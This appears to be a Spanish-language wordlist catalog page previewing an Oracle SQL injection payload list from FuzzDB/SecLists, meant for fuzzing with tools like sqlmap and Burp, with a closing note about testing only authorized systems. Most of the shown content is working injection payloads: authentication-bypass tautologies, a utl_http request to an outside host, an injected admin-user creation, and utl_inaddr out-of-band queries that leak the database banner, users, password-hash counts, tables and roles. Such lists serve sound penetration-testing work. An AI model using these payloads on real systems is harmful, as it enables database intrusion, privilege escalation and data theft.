Skip to content
cyberwordlists
Fuzzing7.7 KB

Oracle SQL Injection (FuzzDB)

Payloads de inyección SQL específicos de Oracle que aprovechan UTL_HTTP, la exfiltración fuera de banda con UTL_INADDR y construcciones PL/SQL. Para sondear back ends de Oracle DB.

Ver fuente
Tamaño
7.7 KB
Categoría
Fuzzing
Fuente
danielmiessler/SecLists
Licencia
MIT
Herramientas recomendadas
sqlmapburp

Vista previa

Las primeras 15 entradas. Descarga o copia la lista completa (7.7 KB) con los botones de arriba.

>head oracle-sqli-fuzzdb.txt7.7 KB
# contains statements from jbrofuzz
’ or ‘1’=’1
' or '1'='1
'||utl_http.request('httP://192.168.1.1/')||'
' || myappadmin.adduser('admin', 'newpass') || '
' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i

Payloads de inyección SQL específicos de Oracle que aprovechan UTL_HTTP, la exfiltración fuera de banda con UTL_INADDR y construcciones PL/SQL. Para sondear back ends de Oracle DB.

Esta lista está orientada al fuzzing de entradas y el descubrimiento de vulnerabilidades. Contiene aproximadamente 7.7 KB y funciona bien con herramientas como sqlmap, burp. Elige la lista más pequeña que se ajuste a tu engagement: las listas más cortas son más rápidas y silenciosas para los ataques en línea, mientras que las listas más grandes ofrecen mayor cobertura para el trabajo offline donde la velocidad es menos determinante.

Puedes copiar la vista previa de muestra directamente desde esta página, copiar la lista completa a tu portapapeles o descargar el archivo .txt sin procesar. La lista completa se sirve directamente desde su fuente original en GitHub.

Obtenida de danielmiessler/SecLists y distribuida bajo MIT. Utiliza wordlists únicamente contra sistemas para los que tengas autorización explícita de prueba.